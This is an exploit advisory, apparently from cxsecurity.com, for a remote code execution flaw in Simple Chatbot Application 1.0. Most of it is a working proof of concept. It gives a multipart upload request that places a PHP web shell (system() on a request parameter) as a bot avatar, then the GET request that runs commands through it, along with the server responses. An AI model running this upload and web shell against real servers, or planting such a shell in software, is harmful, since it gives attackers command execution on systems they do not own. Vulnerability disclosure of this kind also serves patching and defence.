Simple Chatbot Application 1.0 Remote Code Execution (RCE)

2022.01.28
Credit: Saud Alenazi
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Simple Chatbot Application 1.0 - Remote Code Execution (RCE) # Date: 18/01/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html # Version: 1.0 # Tested on: XAMPP, Windows 10 # Exploit : You can upload a php shell file as a bot_avatar or user_avatar or image # ------------------------------------------------------------------------------------------ # POC # ------------------------------------------------------------------------------------------ # Request sent as base user POST /classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost.SA Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------55217074722533208072616276474 Content-Length: 1121 Connection: close -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="name" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="short_name" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="intro" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="no_result" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="img"; filename="" Content-Type: image/jpeg -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="bot_avatar"; filename="bot_avatar.php" Content-Type: application/octet-stream <?php if($_REQUEST['s']) { system($_REQUEST['s']); } else phpinfo(); ?> </pre> </body> </html> -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="user_avatar"; filename="" Content-Type: application/octet-stream -----------------------------55217074722533208072616276474-- # Response HTTP/1.1 200 OK Date: Tue, 18 Jan 2022 00:51:29 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 119 Connection: close Content-Type: text/html; charset=UTF-8 1 # ------------------------------------------------------------------------------------------ # Request to webshell # ------------------------------------------------------------------------------------------ GET /uploads/bot_avatar.php?s=echo+0xSaudi HTTP/1.1 Host: localhost.SA Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Connection: close # ------------------------------------------------------------------------------------------ # Webshell response # ------------------------------------------------------------------------------------------ HTTP/1.1 200 OK Date: Tue, 18 Jan 2022 00:51:29 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Content-Length: 16 Connection: close Content-Type: text/html; charset=UTF-8 <pre>0xSaudi </pre>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top